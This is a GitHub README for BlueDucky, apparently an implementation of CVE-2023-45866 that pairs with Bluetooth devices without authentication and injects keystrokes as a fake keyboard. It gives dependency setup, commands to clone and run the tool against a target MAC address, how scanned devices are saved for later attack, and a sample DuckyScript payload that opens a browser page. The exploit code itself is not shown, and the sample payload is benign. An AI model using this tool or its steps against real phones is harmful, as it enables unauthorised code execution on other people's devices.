Skip to content

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

Notifications You must be signed in to change notification settings

AlphaCorpIN/BlueDucky

Β 
Β 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

52 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

BlueDucky (Android) πŸ¦†

Thanks to all the people at HackNexus. Make sure you come join us on VC ! https://discord.gg/HackNexus

  1. saad0x1's GitHub
  2. spicydll's GitHub

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)

πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

This is an implementation of the CVE discovered by marcnewlin

Introduction πŸ“’

BlueDucky is a powerful tool for exploiting a vulnerability in Bluetooth devices. By running this script, you can:

  1. πŸ“‘ Load saved Bluetooth devices that are no longer visible but have Bluetooth still enabled.
  2. πŸ“‚ Automatically save any devices you scan.
  3. πŸ’Œ Send messages via ducky script format to interact with devices.

I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.

Installation and Usage πŸ› οΈ

Setup Instructions

# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Running BlueDucky

git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

Operational Steps πŸ•ΉοΈ

  1. On running, it prompts for the target MAC address.
  2. Pressing nothing triggers an automatic scan for devices.
  3. Devices previously found are stored in known_devices.txt.
  4. If known_devices.txt exists, it checks this file before scanning.
  5. Executes using payload.txt file.
  6. Successful execution will result in automatic connection and script running.

Duckyscript πŸ’»

🚧 Work in Progress:

  • Suggest me ideas

πŸ“ Example payload.txt:

REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Enjoy experimenting with BlueDucky! 🌟

About

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%